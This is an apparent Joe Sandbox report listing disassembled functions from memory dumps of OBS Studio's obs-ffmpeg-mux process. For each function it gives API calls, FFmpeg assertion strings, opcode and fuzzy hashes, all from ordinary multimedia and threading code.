Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort
String ID: Assertion %s failed at %s:%d$duration >= 0$in_ts != ((int64_t)0x8000000000000000ULL)$src/libavutil/mathematics.c
API String ID: 4206212132-3367517387
Opcode ID: 513caed045a4db0526df902e940f6b02687e0721ee3627fbbd4727eb2fb21fc4
Instruction ID: c6e673b0b102a8f3a0f605770559c2d9b7b31a1e9a28c942a4f6e146193658e4
Opcode Fuzzy Hash: 513caed045a4db0526df902e940f6b02687e0721ee3627fbbd4727eb2fb21fc4
Instruction Fuzzy Hash: A841F42670AB45A0EB20CF41B9506AEA7A8FB88BD0F444436EE8D17B94DE7CE142D740

Function 00007FF8A7C261E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF8A7C262C2

Strings

src/libavutil/tx.c, xrefs: 00007FF8A7C26297, 00007FF8A7C26312
dual_stride <= basis, xrefs: 00007FF8A7C26321
!dual_stride || !(dual_stride & (dual_stride - 1)), xrefs: 00007FF8A7C262A6
Assertion %s failed at %s:%d, xrefs: 00007FF8A7C262B2

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort
String ID: !dual_stride || !(dual_stride & (dual_stride - 1))$Assertion %s failed at %s:%d$dual_stride <= basis$src/libavutil/tx.c
API String ID: 4206212132-1907613106
Opcode ID: b2d68d41104b27e6dcc2f546f5ee05c62e4ee261660e14a4176fa03e21371bc5
Instruction ID: 623f89bacbaf02649187a8c438c71a6faa5f7e00d825b3c5db719894f5cfdf5d
Opcode Fuzzy Hash: b2d68d41104b27e6dcc2f546f5ee05c62e4ee261660e14a4176fa03e21371bc5
Instruction Fuzzy Hash: 9531C432A0E686A7E3609F14A4407AEBAA0FB983D4F504139EA8D43F94DF3CE145DF50

Function 00007FF8BFB5AEC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67COMMON

Download Yara Rule

APIs

av_log.AVUTIL-58 ref: 00007FF8BFB5AF42
abort.MSVCRT ref: 00007FF8BFB5AF47

Strings

s->out_sample_rate == s->in_sample_rate, xrefs: 00007FF8BFB5AF23
Assertion %s failed at %s:%d, xrefs: 00007FF8BFB5AF33
src/libswresample/swresample.c, xrefs: 00007FF8BFB5AF1C

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abortav_log
String ID: Assertion %s failed at %s:%d$s->out_sample_rate == s->in_sample_rate$src/libswresample/swresample.c
API String ID: 208496458-2566888546
Opcode ID: 6f075df65b6eed603a674aefd9f5f2e9a38cef1fcc3b0318237051135531fcf6
Instruction ID: 32398e982eb3367660bff6d0912aebd9e7f87653bbd6ca865867f671309bd87e
Opcode Fuzzy Hash: 6f075df65b6eed603a674aefd9f5f2e9a38cef1fcc3b0318237051135531fcf6
Instruction Fuzzy Hash: B4218161E0974289EB258BADD460779B7A4EF84788F584236EB0D967E4DF3CF542CA00

Function 00007FF8A7C0E750 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF8A7C0E792

Strings

ntsc, xrefs: 00007FF8A7C0E76B
none, xrefs: 00007FF8A7C0E755

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strcmp
String ID: none$ntsc
API String ID: 1004003707-2486863473
Opcode ID: 6b738e6fadc790c156b69ca33ae2bb0c185686464ba8ef256ca71794a6c641fc
Instruction ID: ece8e187a884432e2be6e41c4b877d0b18b9be28aa53ab4d90e72f7450aa6e2b
Opcode Fuzzy Hash: 6b738e6fadc790c156b69ca33ae2bb0c185686464ba8ef256ca71794a6c641fc
Instruction Fuzzy Hash: DB112663F4A151A1E7209F2AFC442BE6790EB44BE8F484431EE0C8B390DF2CE582D380

Function 00007FF8A7C99780 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF8A7C997D6
_ultoa.MSVCRT ref: 00007FF8A7C997E9
OutputDebugStringA.KERNEL32 ref: 00007FF8A7C9982D
abort.MSVCRT ref: 00007FF8A7C99833

Strings

Error cleaning up spin_keys for thread , xrefs: 00007FF8A7C997BE

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: CurrentDebugOutputStringThread_ultoaabort
String ID: Error cleaning up spin_keys for thread
API String ID: 4191895893-2906507043
Opcode ID: 81378f2af0811eeb7f04898ebd31de8b15f56f487cc7d9f9e4b7e3e7059bb688
Instruction ID: 605843d46d9a79c29713b3bc61d8e280d1ad4e5c13bdc5b50d7a6c6dcd825ee8
Opcode Fuzzy Hash: 81378f2af0811eeb7f04898ebd31de8b15f56f487cc7d9f9e4b7e3e7059bb688
Instruction Fuzzy Hash: C71157A2F0EA42E0FBA14F24E01437D9691EF863E1F940734CA6C463C4DE2CE885D302

Function 00007FF8BFBA2780 Relevance: 7.7, APIs: 5, Instructions: 200synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF8BFBA2829

Memory Dump Source

Source File: 0000000B.00000002.2302427408.00007FF8BFBA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFBA0000, based on PE: true

Associated: 0000000B.00000002.2302403121.00007FF8BFBA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302459532.00007FF8BFBA8000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302518486.00007FF8BFBAC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfba0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: ObjectSingleWait
String ID:
API String ID: 24740636-0
Opcode ID: 128c7c0c7c4041ad80a73ece8c7e6e0e6db133071bd0854d49eb70ad7e1cdf79
Instruction ID: daeef98b1e4a0dea13996cca45b89344141df54beb5133216d947f545b4ab9b9
Opcode Fuzzy Hash: 128c7c0c7c4041ad80a73ece8c7e6e0e6db133071bd0854d49eb70ad7e1cdf79
Instruction Fuzzy Hash: 93914232A08A8786EB728BADD40037A73A0FF957E4F555231DB5D86AD5EF3CE8418740

Function 00007FF8A7C978B0 Relevance: 7.7, APIs: 5, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF8A7C97957

Part of subcall function 00007FF8A7C98840: WaitForMultipleObjects.KERNEL32 ref: 00007FF8A7C988B4

ResetEvent.KERNEL32 ref: 00007FF8A7C97917
WaitForSingleObject.KERNEL32 ref: 00007FF8A7C97998

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Wait$ObjectSingle$EventMultipleObjectsReset
String ID:
API String ID: 654736092-0
Opcode ID: 34fbc9e2f4b500ec35d71564d19f70a292e06c702ea4cefd25497b8e02179aaa
Instruction ID: 51e07a7627df7b721f9dd2961a3c4eb8db7bf081996088d0dc3cf7f1be81db99
Opcode Fuzzy Hash: 34fbc9e2f4b500ec35d71564d19f70a292e06c702ea4cefd25497b8e02179aaa
Instruction Fuzzy Hash: 9B512721F0BD23E1FBE15A26954237F4291FF90BD8F591532DD4E826D1ED2CE981B205

Function 00007FF8A7C98970 Relevance: 7.6, APIs: 5, Instructions: 102threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF8A7C989B0

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 64ab8e10bfe97489d8a8b5c547ce0e4a8904eff289fa1a41a4582324bccb7b1a
Instruction ID: b2ba092241d9b732873f9b36c62dd790b3d2eac24044010d1f74a4708b5d54e8
Opcode Fuzzy Hash: 64ab8e10bfe97489d8a8b5c547ce0e4a8904eff289fa1a41a4582324bccb7b1a
Instruction Fuzzy Hash: 7E31C133B0AA12D6FB969F25994876E22D4EF403E0F468535DE0D87280EE3CED81E341

Function 00007FF8BFB89FA4 Relevance: 7.6, APIs: 5, Instructions: 94COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FF8BFB8A01D
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8A03F
DName::DName.LIBVCRUNTIME ref: 00007FF8BFB8A052
DName::DName.LIBVCRUNTIME ref: 00007FF8BFB8A089
DName::DName.LIBVCRUNTIME ref: 00007FF8BFB8A094

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: NameName::$Name::operator+
String ID:
API String ID: 826178784-0
Opcode ID: 7682a6ebcb32bf14f43659220100a1b4a5a4a6e3db385e7ce84af32120df353b
Instruction ID: 6eeeef95698b76e79f9e3e1f8c2b1d531238d4ed4f12a5ed150b659d478995c4
Opcode Fuzzy Hash: 7682a6ebcb32bf14f43659220100a1b4a5a4a6e3db385e7ce84af32120df353b
Instruction Fuzzy Hash: A341CE32B08B56A4EB10CBA8D8811BC77B8BB95BC4B548136EB4D53796DF3CE855C300

Function 00007FF8A7C0A167 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 72stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF8A7C099A4

Strings

true, xrefs: 00007FF8A7C0A179
%-15s , xrefs: 00007FF8A7C099B0
auto, xrefs: 00007FF8A7C0A16A
false, xrefs: 00007FF8A7C0A180

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strcmp
String ID: %-15s $auto$false$true
API String ID: 1004003707-1025821387
Opcode ID: fb3527bd10113371e98a9a1ec61775ec9984070070ae132d8b4dc0cee117fe9d
Instruction ID: 5977a4676dc461ac74f357ac18f31479f61afa7560930f4ec31b7c29e2f52a8d
Opcode Fuzzy Hash: fb3527bd10113371e98a9a1ec61775ec9984070070ae132d8b4dc0cee117fe9d
Instruction Fuzzy Hash: EF312931A0A682B6EB618F11A1457FE2364FB807C5F444036DB8D47A95DF3CF992E780

Function 00007FF8BFB639E6 Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

av_channel_layout_subset.AVUTIL-58 ref: 00007FF8BFB63A11
av_channel_layout_subset.AVUTIL-58 ref: 00007FF8BFB63A2C
av_channel_layout_subset.AVUTIL-58 ref: 00007FF8BFB63A47
av_channel_layout_subset.AVUTIL-58 ref: 00007FF8BFB63A62
av_channel_layout_subset.AVUTIL-58 ref: 00007FF8BFB63A81

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: av_channel_layout_subset
String ID:
API String ID: 2965862492-0
Opcode ID: ffdd762dd7e7d539b56224ab97a8e7a7bb2a5354903c6b430eecf0b001850afc
Instruction ID: 0fc35d34a2f8b9f48963bf41a44535d5327b8b2e9fb9a6270dcf069bb7a782aa
Opcode Fuzzy Hash: ffdd762dd7e7d539b56224ab97a8e7a7bb2a5354903c6b430eecf0b001850afc
Instruction Fuzzy Hash: 7F115806F5B302A0FE595AA8844A37DB3D26F847C0F5CA438CB0F0A7C5EE2EE914C650

Function 00007FF8A7C97400 Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF8A7C97418
ReleaseSemaphore.KERNEL32 ref: 00007FF8A7C97446
LeaveCriticalSection.KERNEL32 ref: 00007FF8A7C97453
LeaveCriticalSection.KERNEL32 ref: 00007FF8A7C97473
LeaveCriticalSection.KERNEL32 ref: 00007FF8A7C97498

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: CriticalSection$Leave$EnterReleaseSemaphore
String ID:
API String ID: 2813224205-0
Opcode ID: f1a7a2740e80d1d3259fae1787131c9bb634157a3b26bf56fc66d50a79331669
Instruction ID: 2cdb3774f0888883a9988f1f358a0daaf70b5c3764e24fe1ed196637b9d49f10
Opcode Fuzzy Hash: f1a7a2740e80d1d3259fae1787131c9bb634157a3b26bf56fc66d50a79331669
Instruction Fuzzy Hash: 1901F533F0652692EB469F26BC812699280FF99BE6F84963ACD1D42750ED3C98C29700

Function 00007FF8BFBA5BA0 Relevance: 7.5, APIs: 5, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF8BFBA5BAC
OpenProcess.KERNEL32 ref: 00007FF8BFBA5BC0
GetLastError.KERNEL32 ref: 00007FF8BFBA5BCB
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFBA5BE1
CloseHandle.KERNEL32 ref: 00007FF8BFBA5BF7

Memory Dump Source

Source File: 0000000B.00000002.2302427408.00007FF8BFBA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFBA0000, based on PE: true

Associated: 0000000B.00000002.2302403121.00007FF8BFBA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302459532.00007FF8BFBA8000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302518486.00007FF8BFBAC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfba0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Process$CloseCurrentErrorHandleLastOpen_errno
String ID:
API String ID: 202612177-0
Opcode ID: 59d5a97e427603bb888d026b8b2610f650cbaf0f5f7bb9ca25a91e49a38cba3c
Instruction ID: bfc40cacb0e7fc4d1df833ae8ef0ff06eeae33e000e00eff2a1c73e454a41cd7
Opcode Fuzzy Hash: 59d5a97e427603bb888d026b8b2610f650cbaf0f5f7bb9ca25a91e49a38cba3c
Instruction Fuzzy Hash: FBF01264F0560747FB295BE998943352391AF48792F845438CB2E86BD0DE6CEDE98710

Function 00007FF8A7BF4910 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 306stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF8A7BF494B
_aligned_free.MSVCRT ref: 00007FF8A7BF4E0E

Strings

d, xrefs: 00007FF8A7BF49CB
Invalid chars '%s' at the end of expression '%s', xrefs: 00007FF8A7BF4A7D

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _aligned_freestrlen
String ID: Invalid chars '%s' at the end of expression '%s'$d
API String ID: 1887580107-3215087449
Opcode ID: 5a1976bc1fae1619cc5837e51ad9f9ceb58bf78b7d192d9c0debe48df1a25819
Instruction ID: 455e391a3b678c1f6062cbe6af7e303c85811717a754a12f3eaaa2af03e41094
Opcode Fuzzy Hash: 5a1976bc1fae1619cc5837e51ad9f9ceb58bf78b7d192d9c0debe48df1a25819
Instruction Fuzzy Hash: 62E1067660AA4691DF50DF1AE4902AE67B0FBC5BC0F105032EB8E47BA6DF6DD842D740

Function 00007FF8BFB53C60 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 204COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF8BFB53EFB

Strings

ctx->channels == out->ch_count, xrefs: 00007FF8BFB53ED7
Assertion %s failed at %s:%d, xrefs: 00007FF8BFB53EE7
src/libswresample/audioconvert.c, xrefs: 00007FF8BFB53ED0

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort
String ID: Assertion %s failed at %s:%d$ctx->channels == out->ch_count$src/libswresample/audioconvert.c
API String ID: 4206212132-1145592257
Opcode ID: 866e3859ebfbb8229919b961fbf36017d54387b83d359a5ec9b00af1929c4d7d
Instruction ID: fbeae8640aec95ce604382149e00a276e9fb86dc1260319f59b7ed5ced6edcbc
Opcode Fuzzy Hash: 866e3859ebfbb8229919b961fbf36017d54387b83d359a5ec9b00af1929c4d7d
Instruction Fuzzy Hash: F661E273B1825686EA64CA8AD464B7973A6FF58BC4F498135CF0D07B90EE3CF4518700

Function 00007FF8BFB5AFA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 193COMMON

Download Yara Rule

Strings

compensating audio timestamp drift:%f compensation:%d in:%d, xrefs: 00007FF8BFB5B181
Failed to compensate for timestamp delta of %f, xrefs: 00007FF8BFB5B250

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

